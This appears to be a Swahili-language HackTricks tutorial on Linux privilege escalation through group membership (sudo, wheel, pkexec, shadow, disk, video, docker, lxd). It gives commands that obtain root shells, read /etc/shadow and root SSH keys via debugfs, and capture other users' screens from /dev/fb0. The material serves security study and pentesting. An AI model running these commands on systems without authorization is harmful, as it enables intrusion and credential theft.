7.8 KiB
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
Vikundi vya Sudo/Admin
PE - Njia ya 1
Marafiki, kwa chaguo-msingi (au kwa sababu fulani programu inahitaji) ndani ya faili ya /etc/sudoers unaweza kupata mistari hii:
# Allow members of group sudo to execute any command
%sudo ALL=(ALL:ALL) ALL
# Allow members of group admin to execute any command
%admin ALL=(ALL:ALL) ALL
Hii inamaanisha kwamba mtumiaji yeyote ambaye ni mwanachama wa kikundi cha sudo au admin anaweza kutekeleza chochote kama sudo.
Ikiwa hii ndiyo hali, ili kuwa root unaweza tu kutekeleza:
sudo su
PE - Njia 2
Tafuta programu-jalizi zote za suid na angalia kama kuna programu-jalizi ya Pkexec:
find / -perm -4000 2>/dev/null
Ikiwa utagundua kuwa faili ya binary ya pkexec ni faili ya SUID na wewe ni mwanachama wa sudo au admin, huenda uweze kutekeleza faili za binary kama sudo kwa kutumia pkexec. Angalia maudhui ya:
cat /etc/polkit-1/localauthority.conf.d/*
Hapo utapata kikundi gani kinaruhusiwa kutekeleza pkexec na kwa chaguo-msingi katika baadhi ya linux inaweza kuonekana baadhi ya vikundi sudo au admin.
Kuwa root unaweza kutekeleza:
pkexec "/bin/sh" #You will be prompted for your user password
Ikiwa unajaribu kutekeleza pkexec na unapata kosa hili:
polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized
Sio kwa sababu huna ruhusa lakini ni kwa sababu hauko na uhusiano bila GUI. Na kuna suluhisho kwa shida hii hapa: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903. Unahitaji vikao vya ssh 2 tofauti:
{% code title="kikao1" %}
echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session
{% code title="kikao2" %}
pkttyagent --process <PID of session1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec
{% endcode %}
Kikundi cha Wheel
Marafiki, kwa chaguo-msingi ndani ya faili ya /etc/sudoers unaweza kupata mstari huu:
%wheel ALL=(ALL:ALL) ALL
Hii inamaanisha kwamba mtumiaji yeyote ambaye ni mwanachama wa kikundi cha wheel anaweza kutekeleza chochote kama sudo.
Ikiwa hii ndiyo hali, ili kuwa root unaweza tu kutekeleza:
sudo su
Kikundi cha Shadow
Watumiaji kutoka kikundi cha shadow wanaweza kusoma faili ya /etc/shadow:
-rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow
Basi, soma faili na jaribu kuvunja baadhi ya hashi.
Kikundi cha Diski
Haki hii ni karibu sawa na ufikiaji wa root kwa sababu unaweza kupata data yote ndani ya kifaa.
Faili: /dev/sd[a-z][1-9]
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow
Tafadhali kumbuka kwamba kwa kutumia debugfs unaweza pia kuandika faili. Kwa mfano, ili kuiga /tmp/asd1.txt
kwenda /tmp/asd2.txt
unaweza kufanya:
debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt
Hata hivyo, ikiwa unajaribu kuandika faili zinazomilikiwa na root kama vile `/etc/shadow` au `/etc/passwd`
, utapata kosa la "Ruhusa imekataliwa".
Kikundi cha Video
Kwa kutumia amri w
unaweza kupata nani ameingia kwenye mfumo na itaonyesha matokeo kama ifuatavyo:
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash
tty1 inamaanisha kuwa mtumiaji yossi ameingia kimwili kwenye kifaa cha terminal kwenye kompyuta.
Kikundi cha video kina ruhusa ya kuona matokeo ya skrini. Kimsingi unaweza kuangalia skrini hizo. Ili kufanya hivyo, unahitaji kunasa picha ya sasa kwenye skrini kwa njia ya data safi na kupata azimio ambalo skrini inatumia. Data ya skrini inaweza kuokolewa kwenye /dev/fb0
na unaweza kupata azimio la skrini hii kwenye /sys/class/graphics/fb0/virtual_size
.
cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size
Kuifungua picha ya asili unaweza kutumia GIMP, chagua faili ya screen.raw
na chagua aina ya faili kuwa Raw image data:
Kisha badilisha upana na urefu kuwa ule unaotumiwa kwenye skrini na angalia aina tofauti za picha (na chagua ile inayoonyesha skrini vizuri zaidi):
Kikundi cha Root
Inaonekana kwa chaguo-msingi wanachama wa kikundi cha root wanaweza kupata ufikiaji wa kubadilisha baadhi ya faili za mipangilio ya huduma au baadhi ya faili za maktaba au vituko vingine vya kuvutia ambavyo vinaweza kutumika kuongeza mamlaka...
Angalia ni faili zipi wanachama wa root wanaweza kubadilisha:
find / -group root -perm -g=w 2>/dev/null
Kikundi cha Docker
Unaweza kufunga mfumo wa faili wa mwenyeji kwenye kiasi cha kifaa, kwa hivyo wakati kifaa kinaanza, kinapakia mara moja chroot
kwenye kiasi hicho. Hii kimsingi inakupa udhibiti kamili wa mfumo.
{% embed url="https://github.com/KrustyHack/docker-privilege-escalation" %}
{% embed url="https://fosterelli.co/privilege-escalation-via-docker.html" %}
Kikundi cha lxc/lxd
lxc - Kupandisha Hadhi ya Uteuzi
Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi wa PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa HackTricks na HackTricks Cloud github repos.